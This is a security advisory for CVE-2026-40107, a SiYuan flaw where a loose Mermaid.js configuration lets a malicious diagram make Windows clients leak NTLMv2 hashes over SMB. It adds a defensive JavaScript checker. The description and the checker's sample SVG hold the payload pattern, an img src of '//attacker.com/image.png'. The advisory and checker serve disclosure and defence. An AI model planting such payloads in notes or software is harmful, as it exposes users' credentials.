PT-2026-31734 · Microsoft+3 · Windows+3

Published: 2026-04-09 · Updated: 2026-04-10 · CVE-2026-40107

CVSS v4.0: 8.7 (High)
Vector: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:L/SA:N
Name of the Vulnerable Software and Affected Versions: SiYuan versions prior to 3.6.4
Description: SiYuan, a personal knowledge management system, prior to version 3.6.4 configured Mermaid.js with 'securityLevel: "loose"' and 'htmlLabels: true'. This configuration allowed tags with 'src' attributes to bypass internal sanitization and be injected into SVG blocks. The SVG was then inserted using innerHTML without further sanitization. When a user opened a note containing a malicious Mermaid diagram, the Electron client fetched the URL in the 'src' attribute. On Windows systems, a protocol-relative URL (//attacker.com/image.png) was interpreted as a UNC path (\\attacker.com\image.png), triggering automatic SMB authentication and potentially sending the victim's NTLMv2 hash to the attacker.
Recommendations: Update SiYuan to version 3.6.4 or later.
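As an added example, not code from SiYuan or Mermaid, the JavaScript below contrasts the option pair the advisory names with a hardened pair and shows a check that runs over rendered SVG markup before it reaches innerHTML, flagging src values that Windows would treat as a UNC path. The hardened values, the scheme allowlist, the function names and the sample SVG are assumptions.

```javascript
// Added example, not SiYuan's or Mermaid's own code. Option names follow
// mermaid.initialize() as the advisory quotes them; the hardened values,
// the allowlist of schemes and the sample SVG below are assumptions.
const weakMermaidConfig = { securityLevel: "loose", htmlLabels: true };
const hardenedMermaidConfig = { securityLevel: "strict", htmlLabels: false };

// Return one finding per option that enables the advisory's combination;
// an empty list means neither risky value is set.
function auditMermaidConfig(cfg) {
  const findings = [];
  if (cfg.securityLevel === "loose") {
    findings.push("securityLevel 'loose' skips Mermaid's tag sanitization");
  }
  if (cfg.htmlLabels === true) {
    findings.push("htmlLabels true lets raw HTML (including src attributes) into SVG labels");
  }
  return findings;
}

// A src beginning with two slashes is protocol-relative on the web, but on
// Windows the same text is a UNC path (\\host\share), so a client that fetches
// it can trigger SMB authentication. Backslashes are normalised first.
function isUnsafeSrc(src) {
  const v = src.trim().replace(/\\/g, "/");
  if (v.startsWith("//")) return true;                 // UNC / protocol-relative
  if (/^[a-z][a-z0-9+.-]*:/i.test(v)) {                // has a scheme
    return !/^(https?|data):/i.test(v);                // file:, C:, etc.
  }
  return false;                                        // relative path
}

// Collect unsafe src values from rendered SVG markup before it reaches innerHTML.
// A regex is enough to illustrate the check; use a DOM-based sanitizer in production.
function findUnsafeSrcs(svgMarkup) {
  const re = /<[a-z][\w-]*\b[^>]*\bsrc\s*=\s*["']([^"']*)["']/gi;
  const hits = [];
  let m;
  while ((m = re.exec(svgMarkup)) !== null) {
    if (isUnsafeSrc(m[1])) hits.push(m[1]);
  }
  return hits;
}

// Constructed sample: what an htmlLabels diagram might render to.
const sampleSvg =
  '<svg><foreignObject><div><img src="//attacker.com/image.png"/>' +
  '<img src="https://example.com/ok.png"/></div></foreignObject></svg>';
console.log(auditMermaidConfig(weakMermaidConfig));     // two findings
console.log(auditMermaidConfig(hardenedMermaidConfig)); // []
console.log(findUnsafeSrcs(sampleSvg));                 // ["//attacker.com/image.png"]
```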

Fix

SSRF

Weakness Enumeration

Related Identifiers

CVE-2026-40107
GHSA-W95V-4H65-J455

Affected Products

Electron
Mermaid.Js
Siyuan
Windows